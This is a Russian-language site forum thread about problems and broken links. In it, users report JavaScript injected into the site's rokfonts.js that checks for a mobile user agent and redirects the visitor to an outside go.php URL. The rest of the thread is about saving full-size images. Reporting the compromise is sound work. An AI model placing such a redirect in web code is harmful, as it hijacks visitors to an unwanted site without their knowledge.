Перейти к содержанию

Проблемы, ошибки, нерабочие ссылки


Asuka

Рекомендуемые сообщения

На этот раз внедрение произошло в rokfonts.js:

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://goodpotok2.com/go.php?sid=1";}

Это какой-то плагин? Взяли с червяком поди.

Ссылка на комментарий
Поделиться на другие сайты

Еще редиректит?
С мобильного редиректит, с настольного зашел - в том же скрипте та же закладка. У вас .js не кэшируется случаем? Может, я старый файл получаю?
Ссылка на комментарий
Поделиться на другие сайты

  • 2 weeks later...

Поскольку эта тема закрыта, не нашел куда еще написать, кроме как сюда. Так вот:

Из под любого браузера очень затруднительно качать с сайта выложенные в новостях изображения. Увеличиваться то они нормально увеличиваются, но по нажатию на картинку правой кнопкой мыши, в выпадающем меню нет пункта "сохранить изображение..." или ему подобного.

В открывшемся окошке есть кнопка "Close", но нет кнопки "Save", как на форуме. Собственно, только и прошу, чтобы появилась эта самая кнопочка "save"

Ссылка на комментарий
Поделиться на другие сайты

Можно по превью тынкуть ПКМ и нажать (в хроме. В других, наверняка тоже что-то подобное есть) "Открыть ссылку в новой вкладке", оттудова уже и сохранять.

АП: а ещё можно нажать "Сохранить ссылку как..." и он сразу сохранит большую картинку.

Ссылка на комментарий
Поделиться на другие сайты

я помоему уже спрашивал но забыл - разве в мозилле и хроме по колесу мыши не открывается вкладка на фоне? только опера такая клевая?)

в общем если вот так по превью жать, оно сразу большие открывает.

Ссылка на комментарий
Поделиться на другие сайты

АП: а ещё можно нажать "Сохранить ссылку как..." и он сразу сохранит большую картинку.

В огнелисе это будет "сохранить объект как". Благодарю, работает.

Но тем не менее, от кнопочки я бы не отказался.

Ссылка на комментарий
Поделиться на другие сайты

  • .Дзю. locked и unpinned this тема
Гость
Эта тема закрыта для публикации ответов.
  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
×
×
  • Создать...